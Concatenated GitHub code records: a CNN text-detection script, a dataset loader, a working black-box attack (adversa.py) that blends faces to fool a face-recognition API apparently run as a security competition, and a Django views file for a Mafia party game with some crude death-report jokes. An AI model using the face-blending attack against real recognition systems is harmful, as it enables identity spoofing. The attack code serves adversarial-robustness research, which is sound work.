X_test.reshape(X_test.shape[0], X_test.shape[1], X_test.shape[2], 1)\nX_validation = X_validation.reshape(X_validation.shape[0], X_validation.shape[1], X_validation.shape[2], 1)\n\n\n#Augument the data --for looking real\ndataGen = ImageDataGenerator(width_shift_range=0.1, height_shift_range=0.1, zoom_range=0.2, shear_range=0.1, rotation_range=10)\ndataGen.fit(X_train)#augument it send it back\n\n#encoding\ny_train = to_categorical(y_train, noOfClasses)\ny_test = to_categorical(y_test, noOfClasses)\ny_validation = to_categorical(y_validation, noOfClasses)\n\n#### CREATING THE MODEL \ndef myModel():\n noOfFilters = 60\n sizeOfFilter1 = (5,5)\n sizeOfFilter2 = (3, 3)\n sizeOfPool = (2,2)\n noOfNodes= 500\n\n model = Sequential()\n model.add((Conv2D(noOfFilters,sizeOfFilter1,input_shape=(imageDimensions[0],\n imageDimensions[1],1),activation='relu')))\n model.add((Conv2D(noOfFilters, sizeOfFilter1, activation='relu')))\n model.add(MaxPooling2D(pool_size=sizeOfPool))\n model.add((Conv2D(noOfFilters//2, sizeOfFilter2, activation='relu')))\n model.add((Conv2D(noOfFilters//2, sizeOfFilter2, activation='relu')))\n model.add(MaxPooling2D(pool_size=sizeOfPool))\n model.add(Dropout(0.5))\n\n model.add(Flatten())\n model.add(Dense(noOfNodes,activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(noOfClasses, activation='softmax'))\n\n model.compile(Adam(lr=0.001),loss='categorical_crossentropy',metrics=['accuracy'])\n return model\n\nmodel = myModel()\nprint(model.summary())\n","repo_name":"rajesh0025/Projects","sub_path":"TextDetectionUsingNeuralNetworks/TextDtection.py","file_name":"TextDtection.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"31203622391","text":"from datasets import load_dataset\n\nfrom mlproject.decorators import configurable\n\n\n@configurable\ndef build_dataset(\n dataset_name: str,\n data_dir: str,\n sets_to_include=None,\n):\n if sets_to_include is None:\n sets_to_include = [\"train\", \"validation\"]\n\n dataset = {}\n for set_name in sets_to_include:\n data = load_dataset(\n path=dataset_name,\n split=set_name,\n cache_dir=data_dir,\n task=\"image-classification\",\n )\n dataset[set_name] = data\n\n return dataset\n","repo_name":"AntreasAntoniou/minimal-ml-template","sub_path":"mlproject/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"66"} +{"seq_id":"73319978129","text":"import torch\nimport torch.nn as nn\nimport json\nimport subprocess\nfrom tinydb import TinyDB\nimport uuid\n\nimport shutil\nfrom PIL import Image, ImageDraw, ImageFilter\n\n\nfrom torchvision.transforms.functional import adjust_contrast, adjust_saturation, adjust_brightness\n\nimport utils.conversions as con\nfrom utils.preprocessing import Preprocessor\n\n\nclass AdversaModel(nn.Module):\n def __init__(self, api_key, save_name=None):\n super().__init__()\n MLSEC_API_KEY = api_key\n self.url = f\"https://api.mlsec.io/api/facerecognition/submit_sample/?api_token={MLSEC_API_KEY}\"\n self.folder = \"/scratch/ameinke03/\"\n if save_name is None:\n self.save_name = str(uuid.uuid1())\n else:\n self.save_name = save_name\n self.save_name += '.png'\n \n def forward(self, x):\n raise NotImplemented()\n \n def forward_class(self, x, y_target, y_source=0):\n img = con.torch_to_PIL(x)\n image_path = self.folder + self.save_name\n img.save(image_path)\n url = self.url + f\"&source={y_source}&target={y_target}\"\n response = subprocess.run(['curl', '-X', 'POST', '--data-binary', f'@{image_path}', f'{url}'], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)\n\n model_result = self.parse_response(response)\n return model_result\n \n def parse_response(self, response):\n result = response.stdout.decode(\"utf-8\").split('\\n')[0]\n model_result = json.loads(result)\n return model_result\n \n \nclass SquareAttackWrapper(nn.Module):\n def __init__(self, model, y_source, y_target, weights=torch.ones(2), verbose=False):\n super().__init__()\n self.model = model\n self.weights = weights\n self.y_source = y_source\n self.y_target = y_target\n self.verbose = verbose\n \n def forward(self, x):\n response = self.model.forward_class(x[0], y_target=self.y_target, y_source=self.y_source)\n score = compute_score_from_output(response)\n if self.verbose:\n print(f'Response:\\t{response}')\n print(f'Score:\\t{score}')\n return torch.tensor([4, score]).unsqueeze(0)\n \n \n# random search with attack parameters: position_x, position_y, width, height, lambda, mask_softener\nclass ImageInterpolator(nn.Module):\n def __init__(self, img_source, img_target):\n super().__init__()\n self.img_s = img_source\n self.img_t = img_target\n self.x_s = con.PIL_to_torch(self.img_s)\n \n def forward(self, v):\n box_s = [int(v[i].item()) for i in range(4)]\n box_t = [int(v[i].item()) for i in range(4,8)]\n border_softening = int(v[8])\n lam = torch.sigmoid(v[9]) \n \n img_t_cropped = self.img_t.crop(tuple(box_t))\n width = box_s[2] - box_s[0]\n height = box_s[3] - box_s[1]\n \n x_t_cropped = con.PIL_to_torch(img_t_cropped.resize((width,height)))\n x_t = torch.zeros_like(self.x_s)\n x_t[:,box_s[1]:box_s[3],box_s[0]:box_s[2]] = x_t_cropped\n \n mask = self.generate_mask(box_s, border_softening)\n \n # mask -= self.create_gaussian_dot(v[16:22])\n mask = torch.clip(mask, 0, 1)\n \n # x_s_transformed = self.transform(v[10:13], self.x_s)\n x_s_transformed = self.x_s\n x_t_transformed = self.transform(v[13:16], x_t)\n sample = mask*(lam*x_t_transformed + (1-lam)*x_s_transformed) + (1-mask)*x_s_transformed\n \n return sample\n \n def transform(self, param_vec, sample):\n contrast_factor = param_vec[0].exp()\n saturation_factor = param_vec[1].exp()\n brightness_factor = param_vec[2].exp()\n \n transformed = adjust_contrast(sample, contrast_factor=contrast_factor)\n transformed = adjust_saturation(transformed, saturation_factor=saturation_factor)\n transformed = adjust_brightness(transformed, brightness_factor=brightness_factor)\n \n return transformed\n \n def create_gaussian_dot(self, param_vec):\n pos_x, pos_y = param_vec[0], param_vec[1]\n var = param_vec[2]**2 + 1e-1\n color = param_vec[3:6]\n \n shape = self.x_s.shape\n xx, yy = torch.arange(shape[1]), torch.arange(shape[2])\n gauss = ( -((xx[:,None]-pos_x)**2 + (yy[None,:]-pos_y)**2) / var ).exp()\n gauss_dot = color[:,None,None] * gauss[None,:,:]\n return gauss_dot\n \n \n def generate_mask(self, box, border_softening):\n mask = torch.zeros_like(self.x_s)\n mask[:, box[1]:box[3], box[0]:box[2]] = 1\n\n for i in range(border_softening):\n smoothed_value = 1-float(i)/border_softening\n mask[:, box[1]+i, box[0]:box[2]] = 1 - smoothed_value\n mask[:, box[1]:box[3], box[0]+i] = 1 - smoothed_value\n mask[:, box[3]-i, box[0]:box[2]] = 1 - smoothed_value\n mask[:, box[1]:box[3], box[2]-i] = 1 - smoothed_value\n\n for i in range(border_softening):\n for j in range(border_softening):\n smoothed_value = max([float(i+j)/border_softening-1, 0])\n mask[:, box[1]+i, box[0]+j] = smoothed_value\n mask[:, box[1]+i, box[2]-j] = smoothed_value\n mask[:, box[3]-i, box[0]+j] = smoothed_value\n mask[:, box[3]-i, box[2]-j] = smoothed_value\n\n return mask\n# def generate_mask(self, box, border_softening):\n# mask = torch.zeros_like(self.x_s)\n# mask[:, box[1]:box[3], box[0]:box[2]] = 1\n\n# for i in range(border_softening):\n# smoothed_value = 1-float(i)/border_softening\n# mask[:, box[1]+i, box[0]:box[2]] = 1 - smoothed_value\n# mask[:, box[1]:box[3], box[0]+i] = 1 - smoothed_value\n# mask[:, box[3]-i, box[0]:box[2]] = 1 - smoothed_value\n# mask[:, box[1]:box[3], box[2]-i] = 1 - smoothed_value\n\n# mask[:, box[1]:box[1]+i, box[0]:box[0]+i] = 0.1\n# mask[:, box[1]:box[1]+i, box[2]-i:box[2]] = 0.1\n# mask[:, box[3]-i:box[3], box[0]:box[0]+i] = 0.1\n# mask[:, box[3]-i:box[3], box[2]-i:box[2]] = 0.1\n \n# return mask\n\ndef compute_score_from_output(output):\n conf = output['confidence']\n stealth = output['stealthiness']\n if conf<0.01:\n return -1. + stealth\n if conf+stealth < 1.:\n return conf\n elif stealth<0.5:\n return conf + stealth \n elif conf<1.:\n return 2. + conf\n else:\n return 2. + conf + stealth\n\n \nclass RandomSearchWrapper(nn.Module):\n def __init__(self, model, interpolator, source_id, target_id):\n super().__init__()\n self.model = model\n self.interpolator = interpolator\n self.source_id = source_id\n self.target_id = target_id\n \n def forward(self, v):\n sample = self.interpolator(v)\n model_output = self.model.forward_class(sample, self.target_id, y_source=self.source_id)\n return compute_score_from_output(model_output)\n \n \nclass RandomSearchAttack():\n def __init__(self, wrapper, epochs=20, magnitude=50, verbose=True, step_size=None):\n self.wrapper = wrapper\n self.magnitude = magnitude\n self.epochs = epochs\n self.verbose = verbose\n \n magnitude = self.magnitude\n if step_size is None:\n self.step_size = torch.tensor([20.,20.,20,20, \n 20.,20,20,20, \n 5, .1] + 6*[0.1]\n + [50, 50, 2, .2, .2, .2]) / magnitude\n else:\n self.step_size = step_size\n \n def run(self, v):\n prev_point = v\n\n prev_value = self.wrapper(prev_point)\n if self.verbose:\n print(f'Starting value: {prev_value}')\n\n magnitude = self.magnitude\n step_size = self.step_size\n\n epochs = self.epochs\n for i in range(5*epochs):\n if i==epochs:\n magnitude = 30\n elif i==2*epochs:\n magnitude = 10\n elif i==3*epochs:\n magnitude = 3\n elif i==4*epochs:\n magnitude = 1\n elif i==5*epochs:\n magnitude = .5\n\n delta = magnitude*step_size*torch.randn(len(v))\n \n try:\n new_point = prev_point + delta\n value = self.wrapper(new_point)\n except:\n continue\n\n if self.verbose:\n # print('')\n # print(i)\n print(f'{value}')\n # print('{new_point[:4]}\\n{new_point[4:8]}\\n{new_point[8:]}')\n\n if value>prev_value:\n prev_value = value\n prev_point = prev_point + delta\n \n if value>3.0:\n break;\n\n return prev_point\n\n \nclass AttackScheduler():\n def __init__(self, api_key, extension_factor=1.):\n self.model = AdversaModel(api_key)\n self.preprocessor = Preprocessor(extension_factor=1.)\n self.db = TinyDB('evals/results.json')\n \n def attack_pair(self, source_id, target_id, verbose=True, epochs=None):\n if epochs is None:\n epochs = 100\n \n assert source_id!=target_id\n img_s = Image.open(f'adversa_data/{source_id}_{source_id}.png')\n img_t = Image.open(f'adversa_data/{target_id}_{target_id}.png')\n\n interpolator = ImageInterpolator(img_s, img_t)\n \n _, box_s, _ = self.preprocessor(img_s)\n _, box_t, _ = self.preprocessor(img_t)\n\n initial_point = torch.cat([torch.tensor(box_s), \n torch.tensor(box_t), \n torch.tensor([50, 2.0]), \n torch.zeros(6), \n torch.tensor([100,100,5,.5,.5,.5])\n ], 0)\n \n wrapper = RandomSearchWrapper(self.model, interpolator, source_id, target_id)\n attack = RandomSearchAttack(wrapper, verbose=verbose, epochs=epochs)\n\n final_point = attack.run(initial_point)\n sample = interpolator(final_point)\n \n output = self.model.forward_class(sample, target_id, y_source=source_id)\n \n self.store_output(output, source_id, target_id, final_point)\n \n \n def store_output(self, output, source_id, target_id, final_point):\n doc_id = self.get_doc_id(source_id, target_id)\n entry = self.db.get(doc_id=doc_id)\n assert entry['Name'] == f'{source_id}_{target_id}'\n \n if output['success'] and output['confidence']>entry['confidence']:\n entry['confidence'] = output['confidence']\n entry['success'] = output['success']\n entry['stealthiness'] = output['stealthiness']\n entry['v'] = final_point.tolist()\n \n shutil.copyfile(self.model.folder + self.model.save_name, \n f'adversa_results/{source_id}_{target_id}.png')\n self.db.update(entry, doc_ids=[doc_id])\n print('Replaced old entry')\n print(entry)\n \n def get_doc_id(self, source_id, target_id):\n doc_id = 0\n stop = False\n for i in range(10):\n if stop:\n break\n for j in range(10):\n if i==j:\n continue\n else:\n doc_id += 1\n if i==source_id and j==target_id:\n stop = True\n break\n return doc_id\n \n def summarize_results(self):\n conf = sum([el['confidence'] for el in self.db.all()])\n stealth = sum([el['stealthiness'] for el in self.db.all()])\n print(f'Confidence: {conf}')\n print(f'Stealthiness: {stealth}')\n return conf, stealth\n\n \nclass AlternateAttackScheduler(AttackScheduler): \n def attack_pair(self, source_id, target_id, verbose=True, epochs=None):\n if epochs is None:\n epochs = 100\n \n assert source_id!=target_id\n \n wrapper = AlternateRandomSearchWrapper(self.model, source_id, target_id)\n \n step_size = torch.tensor([3, 3, 3, 3, .2, .2])\n attack = RandomSearchAttack(wrapper, verbose=verbose, epochs=epochs, step_size=step_size)\n \n img_s = Image.open(f'adversa_data/{source_id}_{source_id}.png')\n w, h = img_s.size[0], img_s.size[1]\n x, y = 0, 0\n angle = 0\n blur = 0\n \n initial_point = torch.tensor([w, h, x, y, angle, blur])\n final_point = attack.run(initial_point)\n sample = wrapper.interpolate(final_point)\n \n output = self.model.forward_class(sample, target_id, y_source=source_id)\n \n self.store_output(output, source_id, target_id, final_point)\n \n \nclass AlternateRandomSearchWrapper(nn.Module):\n def __init__(self, model, source_id, target_id):\n super().__init__()\n self.model = model\n self.source_id = source_id\n self.target_id = target_id\n self.img_s = Image.open(f'adversa_data/{source_id}_{source_id}.png')\n self.img_t = Image.open(f'adversa_data/{target_id}_{target_id}.png')\n self.mask = Image.open(f'segmentation_masks/{target_id}_{target_id}.png').convert(\"L\") \n self.EPS = 1\n \n def forward(self, v):\n sample = self.interpolate(v)\n model_output = self.model.forward_class(sample, self.target_id, y_source=self.source_id)\n return compute_score_from_output(model_output)\n \n def interpolate(self, v):\n mask_im_blur = self.mask.filter(ImageFilter.GaussianBlur(int(v[5].abs().item()+self.EPS)))\n back_im = self.img_s.copy()\n w, h = int(v[0].abs().item()+self.EPS), int(v[1].abs().item()+self.EPS) #img_t.size\n x, y = int(v[2]), int(v[3]) #0, 0\n angle = v[4]\n new_img_t = self.img_t.resize((w,h)).rotate(angle)\n new_mask_im_blur = mask_im_blur.resize((w,h)).rotate(angle)\n back_im.paste(new_img_t, (x, y), new_mask_im_blur)\n \n sample = con.PIL_to_torch(back_im)\n return sample\n","repo_name":"AlexMeinke/FacialRecognitionAttack","sub_path":"utils/adversa.py","file_name":"adversa.py","file_ext":"py","file_size_in_byte":14295,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"74667927891","text":"from datetime import datetime\nfrom math import floor\nimport random\nimport hashlib\nimport re\nimport json\n\nfrom django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect, Http404, HttpResponse\nfrom django.urls import reverse\nfrom django.contrib import messages\nfrom django.conf import settings\nfrom django.db.models import Count, Q, F, FloatField\nfrom django.db.models.functions import Cast, Coalesce\n\nfrom project.emails import send_email\nfrom .models import *\n\n\nGAMEPLAY_OPTIONS = {\n \"lynching_shared\": {\"description\": \"Everyone can see public lynching votes as they are cast\" },\n \"mafia_kills_shared\": {\"description\": \"Mafia can see who their team mates are trying to assasinate (if they refresh the page)\"},\n \"show_suspicion_pc_on_death\": {\"description\": \"When a player is killed their correct % suspicion is shared with everyone\"},\n #\"shot_clock\": {\"description\": \"Slowest player in the round has 30 seconds to act or their choice is set to None\"},\n}\n\ndef home(request):\n context = {}\n return render(request, 'matthews/home.html', context)\n\n\ndef new_game(request):\n game = Game()\n game.save()\n\n if 'continue' in request.GET:\n old_game_id = request.session['game_id']\n old_game = Game.objects.get(id=old_game_id)\n old_game.next_game = game\n old_game.save()\n game.options = old_game.options\n game.save()\n name = old_game.players.first().name\n else:\n name = request.GET['leader']\n return join(request, game.id, name, True)\n\n\ndef make_invite_hash(game_id, name):\n cleartext = str(game_id) + 'invite_hash' + name + settings.SECRET_KEY\n return hashlib.md5(cleartext.encode('utf-8')).hexdigest()\n\n\ndef make_invite_url(game_id, name):\n kwargs = {'id': game_id, 'name': name, 'hash': make_invite_hash(game_id, name)}\n return settings.BASE_URL + reverse('matthews:join', kwargs=kwargs)\n\n\ndef invite(request, id):\n game = Game.objects.get(id=id)\n\n if game.date_started:\n messages.add_message(request, messages.WARNING, \"Can't invite new players the game has started\")\n return HttpResponseRedirect(reverse('matthews:game'))\n\n if request.method == \"POST\":\n player_list = request.POST['name_and_email']\n\n if game.date_started:\n raise Exception(\"This game has already started, blame {}\".format(game.players.first().name))\n\n for name, email in (x.split(',') for x in player_list.split('\\n')):\n name = name.strip()\n email = email.strip()\n url = make_invite_url(id, name)\n msg = \"Join game {}\".format(url)\n if '@' in email:\n send_email([email], 'Join Matthews Game', html_content=msg, text_content=msg)\n elif not Player.objects.filter(game=game, name=name).first():\n player = Player(name=name, game=game)\n player.save()\n messages.add_message(request, messages.INFO, 'Player {} invited by email with {}'.format(name, url))\n\n return HttpResponseRedirect(reverse('matthews:invite', kwargs={'id': game.id}))\n\n context = {\n 'game': game,\n 'players': game.players.all(),\n 'my_player': Player.objects.filter(id=request.session.get('player_id')).first(),\n }\n return HttpResponseRedirect(reverse('matthews:game'))\n\n\ndef join(request, id, name, hash):\n game = Game.objects.get(id=id)\n\n if hash != True and hash != make_invite_hash(game.id, name):\n messages.add_message(request, messages.INFO, \"The link you follwed is invalid, please check and retry\")\n return HttpResponseRedirect(reverse('matthews:home'))\n\n player = Player.objects.filter(game=game, name=name).first()\n if not player:\n if game.date_started:\n messages.add_message(request, messages.INFO, \"That game has already started so you can't join\")\n return HttpResponseRedirect(reverse('matthews:home'))\n\n player = Player(name=name, game=game)\n player.save()\n\n request.session['game_id'] = game.id\n request.session['player_id'] = player.id\n\n return HttpResponseRedirect(reverse('matthews:game'))\n\n\ndef update_options(request):\n game = Game.objects.get(id=request.session['game_id'])\n if game.players.all().order_by('id').first().id != request.session['player_id']:\n raise Exception('Only leader can update game options')\n\n if game.date_started:\n raise Exception('Can\\'t update options for a game which has started')\n\n if 'reset' in request.POST:\n game.options = None\n game.save()\n\n else:\n roles = {int(id): {'min': int(request.POST.get('min_'+id)),\n 'pc': int(request.POST.get('pc_'+id))\n }\n for id in request.POST.getlist('character_ids[]')}\n\n game.options = {\n 'roles': roles,\n 'gameplay': [x for x in request.POST.getlist('game_options[]')],\n }\n game.save()\n\n if 'start' in request.POST:\n return start(request)\n\n return HttpResponseRedirect(reverse('matthews:game'))\n\n\ndef remove_player(request, id):\n game = Game.objects.get(id=request.session['game_id'])\n if game.players.all().order_by('id').first().id != request.session['player_id']:\n raise Exception('Only leader can remove players')\n\n if game.date_started:\n raise Exception('Can\\'t remove players from a game which has started')\n\n player = Player.objects.get(id=id, game=game)\n player.delete()\n\n return HttpResponseRedirect(reverse('matthews:game'))\n\n\ndef restart(request):\n game = Game.objects.get(id=request.session['game_id'])\n for player in game.players.all():\n player.actions_by.all().delete()\n player.died_in_round = None\n player.character = None\n player.save()\n game.date_started = None\n game.save()\n return HttpResponseRedirect(reverse('matthews:game'))\n\n\ndef restart_round(request, round):\n game = Game.objects.get(id=request.session['game_id'])\n if game.players.all().order_by('id').first().id != request.session['player_id']:\n raise Exception('Only the leader can reset rounds')\n\n Action.objects.filter(done_by__game=game, round__gte=round).delete()\n for player in Player.objects.filter(game=game, died_in_round__gte=round):\n player.died_in_round = None\n player.save()\n return HttpResponseRedirect(reverse('matthews:game'))\n\n\ndef start(request):\n game = Game.objects.get(id=request.session['game_id'])\n if game.players.all().order_by('id').first().id != request.session['player_id']:\n raise Exception('Only the first player in the game can start it')\n\n rng = random.Random()\n num_players = game.players.count()\n\n\n def probabilistic_round(float):\n \"\"\" rounds a value up or down based on its decimal part, eg 2.9 -> 3 90% of the time \"\"\"\n return int(float) + int(rng.random() < float % 1)\n\n character_ids = []\n for character_id, options in game.options.get('roles').items():\n character_ids += [int(character_id)] * max(options['min'], probabilistic_round(num_players * options['pc'] / 100))\n\n character_ids += [CIVILIAN_ID] * (num_players - len(character_ids))\n\n random.Random().shuffle(character_ids)\n\n for player in game.players.all():\n player.character_id = character_ids.pop()\n player.save()\n\n game.date_started = datetime.now()\n game.save()\n\n return HttpResponseRedirect(reverse('matthews:game'))\n\n\ndef build_game_state(game):\n \"\"\" returns a string representing the state of the game \"\"\"\n action_ids = Action.objects.filter(done_by__game=game, round=calculate_round(game)) \\\n .order_by('-id').values_list('id')\n action_id_str = \"\".join([str(x[0]) for x in action_ids])\n if game.date_started:\n return \"{}-{}\".format(game.date_started, action_id_str)\n else:\n return \"{}-{}\".format(game.players.count(), hash(json.dumps(game.options)))\n\n\ndef state(request):\n game = Game.objects.get(id=request.session.get('game_id'))\n return HttpResponse(build_game_state(game))\n\n\ndef game(request):\n\n debug = request.GET.get('debug')\n if debug is not None:\n request.session['debug'] = int(debug)\n messages.add_message(request, messages.INFO, 'debug set to {}'.format(debug))\n return HttpResponseRedirect(reverse('matthews:game'))\n\n is_debug = request.session.get('debug', 0)\n play_as_id = request.GET.get('play_as_id')\n if is_debug and play_as_id:\n request.session['player_id'] = int(play_as_id)\n return HttpResponseRedirect(reverse('matthews:game'))\n\n game_id = request.session.get('game_id')\n if not game_id:\n messages.add_message(request, messages.INFO, \"You're not currently in any game, follow the link in the invite email to join one\")\n return HttpResponseRedirect(reverse('matthews:home'))\n game = Game.objects.get(id=game_id)\n round = calculate_round(game)\n my_player = Player.objects.filter(id=request.session.get('player_id')).first()\n\n if not my_player:\n messages.add_message(request, messages.INFO, 'Your player was kicked from the game')\n return HttpResponseRedirect(reverse('matthews:home'))\n\n i_am_dead = my_player.died_in_round is not None and my_player.died_in_round < round\n\n suspect = None\n if round % 2 == 0 and my_player.character_id == DETECTIVE_ID and not i_am_dead:\n investigation = Action.objects.filter(round=round-1, done_by=my_player).first()\n suspect = investigation.done_to if investigation else None\n\n players = game.players.all()\n\n\n default_roles = {\n MAFIA_ID: {'min': 1, 'pc': 25},\n DOCTOR_ID: {'min': 1, 'pc': 10},\n DETECTIVE_ID: {'min': 1, 'pc': 10},\n }\n\n role_options = game.options.get('roles') if game.options else default_roles\n # add in names to the char options array (as it's annoying to look them up in the template)\n role_options = {int(k): {**v, 'name': ROLE_NAMES[int(k)]}\n for k,v in role_options.items()}\n\n deaths = game.players.filter(died_in_round=round-1)\n\n endgame_type = get_endgame_type(game)\n bad_guy_ids = [MAFIA_ID]\n good_guy_ids = [CIVILIAN_ID, DOCTOR_ID, DETECTIVE_ID]\n day_regex = '^\\d*[02468]$'\n night_regex = '^\\d*[13579]$'\n if endgame_type is not None:\n was_alive_to_act = Q(actions_by__round__lte=F('died_in_round')) | Q(died_in_round__isnull=True)\n was_alive_to_be_acted_on = Q(actions_to__round__lte=F('died_in_round')) | Q(died_in_round__isnull=True)\n players = players.annotate(lynched_bad=Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n actions_by__round__iregex=day_regex,\n actions_by__done_to__character_id__in=bad_guy_ids,\n actions_by__done_to__died_in_round=F('actions_by__round')))\n ).annotate(lynched_good=Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n actions_by__round__iregex=day_regex,\n actions_by__done_to__character_id__in=good_guy_ids,\n actions_by__done_to__died_in_round=F('actions_by__round')))\n ).annotate(killed_bad=Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n character_id=MAFIA_ID,\n actions_by__round__iregex=night_regex,\n actions_by__done_to__character_id__in=bad_guy_ids,\n actions_by__done_to__died_in_round=F('actions_by__round')))\n ).annotate(killed_good=Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n character_id=MAFIA_ID,\n actions_by__round__iregex=night_regex,\n actions_by__done_to__character_id__in=good_guy_ids,\n actions_by__done_to__died_in_round=F('actions_by__round')))\n ).annotate(killed_doctor=Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n character_id=MAFIA_ID,\n actions_by__round__iregex=night_regex,\n actions_by__done_to__character_id=DOCTOR_ID,\n actions_by__done_to__died_in_round=F('actions_by__round')))\n ).annotate(killed_detective=Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n character_id=MAFIA_ID,\n actions_by__round__iregex=night_regex,\n actions_by__done_to__character_id=DETECTIVE_ID,\n actions_by__done_to__died_in_round=F('actions_by__round')))\n ).annotate(lives_saved=Count('actions_by__round', distinct=True,\n filter=Q(was_alive_to_act,\n character_id=DOCTOR_ID,\n actions_by__round__iregex=night_regex,\n actions_by__done_to__actions_to__done_by__character_id__in=bad_guy_ids,\n actions_by__done_to__actions_to__round=F('actions_by__round')))\n ).annotate(suspected_bad_pc=Cast(Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n character_id=CIVILIAN_ID,\n actions_by__round__iregex=night_regex,\n actions_by__done_to__character_id__in=bad_guy_ids)), FloatField())\n / Cast(Coalesce(F('died_in_round'), round) + 1 , FloatField())\n * 2 * 100\n ).annotate(successful_kill_pc=Cast(F('killed_good'), FloatField())\n / Cast(Coalesce(F('died_in_round') + 1, round) , FloatField())\n * 2 * 100\n # this doesn't seem to take into account if mafia was alive\n ).annotate(mafia_target=Count('actions_to', distinct=True,\n filter=Q(was_alive_to_be_acted_on,\n actions_to__round__iregex=night_regex,\n actions_to__done_by__character_id__in=bad_guy_ids))\n ).annotate(mafia_found=Count('actions_by', distinct=True,\n filter=Q(was_alive_to_act,\n character_id=DETECTIVE_ID,\n actions_by__round__iregex=night_regex,\n actions_by__done_to__character_id__in=bad_guy_ids))\n )\n\n players = list(players)\n # todo - add extra params for awards, like so:\n # eg. players[2].favourite_person = \"James\"\n else:\n players = players.annotate(has_acted=Count('actions_by', filter=Q(actions_by__round=round)))\n players = list(players)\n\n current_actions = Action.objects.filter(done_by__game=game, round=round)\n # decorate players with an action if they have one for this round\n for player in players:\n for current_action in current_actions:\n if player.id == current_action.done_by_id:\n player.action = current_action\n\n if 'show_suspicion_pc_on_death' in game.options.get('gameplay', {}) and round > 1:\n for death in deaths:\n correct_actions = death.actions_by.filter(round__iregex=night_regex,\n round__lt=round,\n done_to__character_id__in=bad_guy_ids) \\\n .count()\n death.suspicion_pc = int(correct_actions / floor(round / 2) * 100)\n\n random.seed(game.id+round)\n\n alive_players = [x for x in players if x.died_in_round is None]\n my_player.is_leader = my_player.id == players[0].id\n context = {\n 'debug': is_debug,\n 'invite_url': make_invite_url(game.id, my_player.name),\n 'role_options': role_options,\n 'gameplay_options': GAMEPLAY_OPTIONS,\n 'game': game,\n 'round': round,\n 'is_day': round % 2 == 0,\n 'players': players,\n 'alive_players': alive_players,\n 'random_leader': random.choice(alive_players),\n 'my_player': my_player,\n 'my_action': Action.objects.filter(round=round, done_by=my_player).first(),\n 'num_actions': Action.objects.filter(round=round, done_by__game=game).count(),\n 'action_undone': request.GET.get('undone'),\n 'haunting_action': get_haunting_action(my_player, round),\n 'game_state': build_game_state(game),\n 'votes': Action.objects.filter(round=round-1, done_by__game=game) \\\n .filter(Q(done_by__died_in_round__gte=round-1) | Q(done_by__died_in_round__isnull=True)) \\\n .order_by('done_to'),\n 'deaths': deaths,\n 'death_report': make_death_report(deaths[0].name) if deaths else '',\n 'suspect': suspect,\n 'MAFIA_ID': MAFIA_ID,\n 'DOCTOR_ID': DOCTOR_ID,\n 'DETECTIVE_ID': DETECTIVE_ID,\n 'CIVILIAN_ID': CIVILIAN_ID,\n 'endgame_type': endgame_type,\n }\n\n if endgame_type and game.next_game_id:\n context.update({\n 'next_invite_url': make_invite_url(game.next_game.id, my_player.name),\n })\n return render(request, 'matthews/game.html', context)\n\n\ndef get_haunting_action(player, round):\n actions = Action.objects.filter(round=round-1, done_to=player, done_by__died_in_round__lt=round-1)\n if len(actions):\n return random.Random().choice(list(actions))\n\n\ndef make_death_report(name):\n templates = [\n [\n \"A [horrible,grim,ghastly,concerning,provocative,crazy,deeply unfortunate,regrettable,worrying,largely unexpected] \\\n incident at the [bakery,school,garden center,polio ward,RSPCA,nursing home,young offenders court,Tom Thumb home for tiny little boys] \\\n left {{name}} dead as [a dingbat,a doornail,Jimmy Saville,anything,a dodo,disco,can be].\",\n\n \"Locals came across [a frankly baffling,a deeply worrying,a seemingly unsolvable,an exciting,a disgusting,some kind of] mystery \\\n this morning when they discovered the body of {{name}} \\\n locked inside [a suitcase,a mini-bar,a chest freezer,a really big one of those trinket necklaces,a coal scuttle,their own mind].\",\n\n \"There was [chaos,pandemonium,a grim silence,a lot of tutting,an exchange of stern looks,a stampede,huge crowd,funky smell] \\\n at the [farmers' market,nail salon,corner by the square,edge of town,police cells,crack of dawn,AIDs parade,theatre matinee] this morning \\\n when {{name}}'s [head,arm,spine,severed right leg,spleen,limbless torso,still-sentient brain,decapitated head] was discovered \\\n floating in the [communal milk barrel,water tower,boating pond,second of Mrs Anderson's baths,shallowest puddle around,chef's stock pot].\",\n ],[\n \"[Police,First-responders,A young child,A hungry dog,One of those skinny runners you see,A travelling circus,The rugby sevens team,Celebrity Michael Sheen] \\\n found the body which had a [spatula,baked potato,half-complete Airfix kit,thicket of arrows,punt pole,sharpened leek,miniature version of the Eiffel Tower,number of swords,whole PlayStation controller,fencing foil] \\\n stuck into its [collarbone,clavicle,right temple,belly button,jugular,nose,squishy bits,back passage,mouth,toenail (but in a fatal fashion)]. \\\n They had lost a lot of blood.\",\n\n \"The cause of death was unknown \\\"Apart from \\\n [being dead,their pale colour,male-pattern baldness,a history of alcoholism,narcolepsy,all that acne,avoidable childhood obesity,their different-length legs,a ghastly taste in fashion,poor personal hygiene,misjudged attempts at humour,general unlikeability] \\\n they appeared to be [in peak physical condition,in general good health,in ripping health,in fine form,in roaring shape,fit as a fiddle,reasonably sound of mind,quite well off,newly sober]\\\", said \\\n [the coroner,the chief of police,Mrs Ronson from number 34,a chorus of doctors,Michael Burke,no one ever,the most qualified person we could find to interview].\",\n\n \"Authorities could only identify the body by its \\\n [winning smile,nubile physique,luscious sideburns,shoddy tattoos,expertly plucked eyebrows,one warty toe,overly complex genitalia,useless prehensile tail] \\\n and [Norway,penis,Mickey Mouse,heart,unfortunately,amusingly,nipple,upsettingly,Florida,star,not-quite-swastika]-shaped birth mark.\",\n ],[\n \"Our thoughts, prayers and [best wishes,cash prizes,minimal good will,fresh 